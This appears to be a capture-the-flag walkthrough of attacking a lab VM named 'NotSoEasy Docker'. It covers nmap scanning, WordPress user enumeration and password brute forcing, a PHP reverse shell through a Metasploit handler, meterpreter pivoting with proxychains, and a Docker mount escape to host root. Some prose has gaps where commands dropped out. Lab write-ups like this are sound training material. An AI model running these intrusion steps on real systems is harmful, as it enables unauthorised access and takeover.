Enumeration





┌─[user@parrot]─[~/Desktop]

└──╼ $nmap -sV -sC -A -p- -T5 192.168.1.2

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 17:06 +03

Nmap scan report for 192.168.1.2

Host is up (0.0022s latency).

Not shown: 65532 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)

| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)

| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)

|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)

2375/tcp open docker Docker 17.06.0-ce

| docker-version:

| KernelVersion: 3.13.0-128-generic

| MinAPIVersion: 1.12

| Arch: amd64

| GoVersion: go1.8.3

| ApiVersion: 1.30

| Version: 17.06.0-ce

| Os: linux

| BuildTime: 2017-06-23T21:17:13.228983331+00:00

|_ GitCommit: 02c1d87

| fingerprint-strings:

| FourOhFourRequest:

| HTTP/1.0 404 Not Found

| Content-Type: application/json

| Date: Sat, 16 Feb 2019 14:07:30 GMT

| Content-Length: 29

| {"message":"page not found"}

| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq:

| HTTP/1.1 400 Bad Request

| Content-Type: text/plain; charset=utf-8

| Connection: close

| Request

| GetRequest:

| HTTP/1.0 404 Not Found

| Content-Type: application/json

| Date: Sat, 16 Feb 2019 14:07:05 GMT

| Content-Length: 29

| {"message":"page not found"}

| HTTPOptions:

| HTTP/1.0 200 OK

| Api-Version: 1.30

| Docker-Experimental: false

| Ostype: linux

| Server: Docker/17.06.0-ce (linux)

| Date: Sat, 16 Feb 2019 14:07:05 GMT

| Content-Length: 0

| Content-Type: text/plain; charset=utf-8

| docker:

| HTTP/1.1 400 Bad Request: missing required Host header

| Content-Type: text/plain; charset=utf-8

| Connection: close

|_ Request: missing required Host header

8000/tcp open http Apache httpd 2.4.10 ((Debian))

|_http-generator: WordPress 4.8.8

|_http-open-proxy: Proxy might be redirecting requests

| http-robots.txt: 1 disallowed entry

|_/wp-admin/

|_http-server-header: Apache/2.4.10 (Debian)

|_http-title: NotSoEasy Docker – Just another WordPress site

|_http-trane-info: Problem with XML parsing of /evox/about

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



$wpscan --url http://192.168.1.2:8000 --enumerate

[+] bob

| Detected By: Author Posts - Author Pattern (Passive Detection)

| Confirmed By:

| Rss Generator (Passive Detection)

| Wp Json Api (Aggressive Detection)

| - http://192.168.1.2:8000/wp-json/wp/v2/users/?per_page=100&page=1

| Rss Generator (Aggressive Detection)

| Author Id Brute Forcing - Author Pattern (Aggressive Detection)

| Login Error Messages (Aggressive Detection





$wpscan --url http://192.168.1.2:8000 -P /usr/share/wordlists/rockyou.txt --usernames bob --password-attack wp-login

----------------------------------------

[i] Valid Combinations Found:

| Username: bob, Password: Welcome1

-----------------------------------------





Gaining Access





msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload php/reverse_php

payload => php/reverse_php







msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter

msf post(multi/manage/shell_to_meterpreter) > set session 1

session => 1

msf post(multi/manage/shell_to_meterpreter) > run



[!] SESSION may not be compatible with this module.

[*] Upgrading session ID: 1

[*] Starting exploit/multi/handler

[*] Started reverse TCP handler on 192.168.1.11:4433

[*] Sending stage (861480 bytes) to 192.168.1.12

[*] Command stager progress: 100.00% (773/773 bytes)

[*] Post module execution completed

msf post(multi/manage/shell_to_meterpreter) > sessions 2

[*] Starting interaction with 2...



meterpreter >







meterpreter > ifconfig

Interface 7

============

Name : eth0

Hardware MAC : 02:42:ac:12:00:03

MTU : 1500

Flags : UP,BROADCAST,MULTICAST

IPv4 Address : 172.18.0.3

IPv4 Netmask : 255.255.0.0







msf post(multi/manage/shell_to_meterpreter) > route add 172.18.0.0 255.255.255.0 4

[*] Route added

msf post(multi/manage/shell_to_meterpreter) > route print



IPv4 Active Routing Table

=========================



Subnet Netmask Gateway

------ ------- -------

172.18.0.0 255.255.255.0 Session 4



[*] There are currently no IPv6 routes defined.







┌─[✗]─[root@parrot]─[/home/user]

└──╼ #proxychains ssh 172.18.0.4

ProxyChains-3.1 (http://proxychains.sf.net)

|D-chain|-<>-127.0.0.1:1080-<><>-172.18.0.4:22-<><>-OK

/ $ ls

bin dev entrypoint.sh home lib64 mnt proc run srv tmp var

boot docker-entrypoint-initdb.d etc lib media opt root sbin sys usr





Privilege Escalation





$docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

You should now have a root shell on the host OS

Press Ctrl-D to exit the docker instance / shell

# whoami

root





There are 2 levels in this VM, easy and hard. I'll start with easy one.Firstly, I'm curious about the nmap scan so I'll go with nmap.Let's look at the web page on port 8000.Now, We know this is Wordpress and probably running as a container. I'll focus on Wordpress part for now. Lets look at the WpScan output.Wpscan detected user enumeration vulnerability and find the user bob. Time to brute force on admin panel with user bob.I uploaded the reverse shell in one of the pages. Now, you have got 2 options, you can get reverse shell using nc or any other tool like that or msfconsole. I choose msfconsole because I'll use some metasploit exploits and meterpreter options.Set the options, run and get the access.Now, we are in the container. I want to upgrade shell to meterpreter so I usedI used a lot of kernel exploits and failed so I decided to choose my attack vector. Think about you are in the container, we may be not alone. I tried to find other friends in the host.I gained access to 172.18.0.3 and I must find other ip's that alive on this interface (172.18.0.*) . I can't access other ip's on this interface from my attacker machine so I should set up proxy on this machine. (Pivoting) First, I set up route table.I ranmodule to prepare proxy. Then I go toand added theend of the file. Now, every command that I run using proxychains, work as if command runs in the container. Basic proxy principle, if you don't understand completely, you can search proxy concept on the web. Now we can scan the network 172.18.0.* .After nmap scan, I realized 172.18.0.4 's 22. port is open. Now, I'm in the second container in the host because ssh didn't ask password.After some time, I realizedis visible on the system. After some research, I found a way to reach host machine on this blog . If you want to learn more about this way, I strongly recommend take a look at that blog post.